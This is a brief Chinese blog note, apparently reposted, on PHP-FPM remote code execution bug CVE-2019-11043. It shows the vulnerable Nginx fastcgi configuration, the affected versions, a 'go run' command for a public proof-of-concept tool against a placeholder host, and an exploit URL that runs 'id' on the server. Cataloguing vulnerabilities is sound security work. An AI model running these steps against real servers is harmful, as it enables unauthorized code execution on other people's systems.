码迷,mamicode.com
首页 > 编程语言 > 详细

应用安全 - 编程语言漏洞 - PHP语言漏洞汇总

时间:2019-10-24 23:56:58      阅读:166      评论:0      收藏:0      [点我收藏+]

标签:配置   汇总   version   配置文件信息   stc   span   index   fastcgi   color   

CVE-2019-11043

Date:
2019.9.16

类型:
远程代码执行

前置条件:
Nginx + fastcgi + php-fpm 
配置文件信息如下:
location ~ [^/]\.php(/|$) {
  ...
  fastcgi_split_path_info ^(.+?\.php)(/.*)$;
  fastcgi_param PATH_INFO       $fastcgi_path_info;
  fastcgi_pass   php:9000;
  ...
}

影响范围:
version>php 7, php5(EXP暂无)

PoC:
https://github.com/neex/phuip-fpizdam
go run . "http://ip:8080/index.php"

ExP:
http://ip:8080/index.php?a=id

应用安全 - 编程语言漏洞 - PHP语言漏洞汇总

标签:配置   汇总   version   配置文件信息   stc   span   index   fastcgi   color   

原文地址:https://www.cnblogs.com/AtesetEnginner/p/11735653.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!